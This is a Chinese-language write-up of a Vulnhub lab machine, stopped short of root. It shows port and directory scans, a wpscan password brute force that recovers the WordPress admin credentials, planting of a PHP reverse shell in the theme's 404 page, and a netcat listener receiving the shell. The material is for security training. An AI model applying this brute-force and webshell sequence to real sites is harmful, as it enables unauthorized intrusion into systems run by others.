Vulnhub Vulnerable Container Docker靶机(部分,没有拿到root)
Vulnerable Container Docker
识别目标主机的IP地址
─(kali㉿kali)-[~/Vulnhub/Vulnerable_container]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.91.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:57:2d:6b 1 60 PCS Systemtechnik GmbH
192.168.56.104 08:00:27:ac:76:db 1 60 PCS Systemtechnik GmbH
利用netdiscover工具识别目标主机的IP地址为192.168.56.104
NMAP扫描
─$ sudo nmap -sS -sV -sC -p- 192.168.56.104 -oN nmap_full_scan
sudo: unable to resolve host kali: Name or service not known
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 22:46 EDT
Nmap scan report for localhost (192.168.56.104)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA)
| 2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA)
| 256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA)
|_ 256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519)
8000/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.10 (Debian)
|_http-generator: WordPress 4.8.1
|_http-title: NotSoEasy Docker – Just another WordPress site
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
MAC Address: 08:00:27:AC:76:DB (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.66 seconds
NMAP扫描结果显示目标主机仅有两个开放端口22以及8000
信息收集
只能从8000端口展开信息收集
──(kali㉿kali)-[~/Vulnhub/Vulnerable_container]
└─$ curl http://192.168.56.104:8000
<!DOCTYPE html>
<html lang="en-US" class="no-js no-svg">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">
(省略)
是一个博客网站(wordpress版本4.8.1)
(kali㉿kali)-[~/Vulnhub/Vulnerable_container]
└─$ curl http://192.168.56.104:8000/robots.txt
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
扫描一下有哪些目录:
──(kali㉿kali)-[~/Vulnhub/Vulnerable_container]
└─$ gobuster dir -u http://192.168.56.104:8000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.104:8000
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/10/25 22:53:46 Starting gobuster in directory enumeration mode
===============================================================
/about (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/about/]
/contact (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/contact/]
/blog (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/blog/]
/home (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/home/]
/rss (Status: 200) [Size: 2402]
/login (Status: 302) [Size: 0] [--> http://192.168.56.104:8000/wp-login.php]
/0 (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/0/]
/feed (Status: 200) [Size: 17992]
/atom (Status: 200) [Size: 20055]
/s (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/sample-page/]
/b (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/blog/]
/a (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/a-homepage-section/]
/c (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/contact/]
/wp-content (Status: 301) [Size: 328] [--> http://192.168.56.104:8000/wp-content/]
/p (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/post-6/]
/admin (Status: 302) [Size: 0] [--> http://192.168.56.104:8000/wp-admin/]
/Home (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/Home/]
/post (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/post-6/]
/h (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/2017/08/19/hello-world/]
/rss2 (Status: 200) [Size: 17992]
/Contact (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/Contact/]
/About (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/About/]
/wp-includes (Status: 301) [Size: 329] [--> http://192.168.56.104:8000/wp-includes/]
/C (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/contact/]
/A (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/a-homepage-section/]
/P (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/post-6/]
/S (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/sample-page/]
/Blog (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/Blog/]
/B (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/blog/]
/H (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/2017/08/19/hello-world/]
/page2 (Status: 200) [Size: 61436]
/bl (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/blog/]
/sa (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/sample-page/]
/rdf (Status: 200) [Size: 16332]
/page1 (Status: 200) [Size: 71444]
/sample (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/sample-page/]
/co (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/contact/]
/page3 (Status: 200) [Size: 61563]
/page4 (Status: 200) [Size: 61611]
/page5 (Status: 200) [Size: 61603]
/page6 (Status: 200) [Size: 61591]
/dashboard (Status: 302) [Size: 0] [--> http://192.168.56.104:8000/wp-admin/]
/he (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/2017/08/19/hello-world/]
/page7 (Status: 200) [Size: 61591]
/ab (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/about/]
/page10 (Status: 200) [Size: 61555]
/%20 (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/]
/page8 (Status: 200) [Size: 61591]
/sam (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/sample-page/]
/page9 (Status: 200) [Size: 61594]
/page11 (Status: 200) [Size: 61402]
/cont (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/contact/]
/po (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/post-6/]
/page12 (Status: 200) [Size: 55009]
/ho (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/home/]
/coffee (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/coffee/]
/hello (Status: 301) [Size: 0] [--> http://192.168.56.104:8000/2017/08/19/hello-world/]
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_container]
└─$ wpscan --url http://192.168.56.104:8000 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
Scan Aborted: Canceled by User
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_container]
└─$ wpscan --url http://192.168.56.104:8000 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.104:8000/ [192.168.56.104]
[+] Started: Tue Oct 25 23:00:45 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.10 (Debian)
| - X-Powered-By: PHP/5.6.31
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.56.104:8000/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.104:8000/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.104:8000/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.104:8000/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8.1 identified (Insecure, released on 2017-08-02).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.104:8000/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>
| - http://192.168.56.104:8000/comments/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://192.168.56.104:8000/wp-content/themes/twentyseventeen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.104:8000/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://192.168.56.104:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.104:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1, Match: 'Version: 1.3'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] bob
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.104:8000/wp-json/wp/v2/users/?per_page=100&page=1
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Oct 25 23:00:55 2022
[+] Requests Done: 62
[+] Cached Requests: 18
[+] Data Sent: 16.185 KB
[+] Data Received: 1.179 MB
[+] Memory used: 238.555 MB
[+] Elapsed time: 00:00:09
识别出用户名bob, 应当是管理员(因为第一个Post由该用户创建)
然后破解bob的密码
可以继续用wpscan工具进行爆破,虽然看了其他人的攻略,用其他工具,我还是使用wpscan工具,虽然时间比较长,大概20多分钟,但是成功拿到了bob的密码:
─(kali㉿kali)-[~/Vulnhub/Vulnerable_container]
└─$ wpscan --url http://192.168.56.104:8000 -U bob -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.104:8000/ [192.168.56.104]
[+] Started: Tue Oct 25 23:04:36 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.10 (Debian)
| - X-Powered-By: PHP/5.6.31
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.56.104:8000/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.104:8000/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.104:8000/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.104:8000/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8.1 identified (Insecure, released on 2017-08-02).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.104:8000/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>
| - http://192.168.56.104:8000/comments/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://192.168.56.104:8000/wp-content/themes/twentyseventeen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.104:8000/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://192.168.56.104:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.104:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1, Match: 'Version: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:03 <=======================> (137 / 137) 100.00% Time: 00:00:03
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - bob / Welcome1
Trying bob / Welcome1 Time: 00:20:41 < > (40400 / 14384792) 0.28% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: bob, Password: Welcome1
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Oct 25 23:25:34 2022
[+] Requests Done: 40542
[+] Cached Requests: 38
[+] Data Sent: 20.883 MB
[+] Data Received: 24.873 MB
[+] Memory used: 251.355 MB
[+] Elapsed time: 00:20:58
登录wordpress后台,将php shell上传至后台,appearance -> editor, 编辑404页面,并将内容替换为php shell的内容。
然后访问
http://192.168.56.104:8000/wp-content/themes/default/404.php
得到shell
─$ sudo nc -nlvp 5555
sudo: unable to resolve host kali: Name or service not known
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.104] 56190
Linux 8f4bca8ef241 3.13.0-128-generic #177-Ubuntu SMP Tue Aug 8 11:40:23 UTC 2017 x86_64 GNU/Linux
03:28:03 up 44 min, 0 users, load average: 0.38, 2.89, 3.56
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
$ bash -i
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@8f4bca8ef241:/$
www-data@8f4bca8ef241:/$ ss -tunlp
ss -tunlp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 127.0.0.11:37172 *:*
tcp LISTEN 0 128 127.0.0.11:42117 *:*
tcp LISTEN 0 128 *:80 *:*
目前应该仍然在容器里。
www-data@8f4bca8ef241:/$ ss -ntp
ss -ntp
State Recv-Q Send-Q Local Address:Port Peer Address:Port
CLOSE-WAIT 1 0 172.18.0.2:80 192.168.56.101:47602
ESTAB 0 79 172.18.0.2:56190 192.168.56.101:5555 users:(("ss",pid=117,fd=15))
ESTAB 0 0 172.18.0.2:57532 172.18.0.3:3306 users:(("ss",pid=117,fd=14))
www-data@8f4bca8ef241:/$
STRIVE FOR PROGRESS,NOT FOR PERFECTION
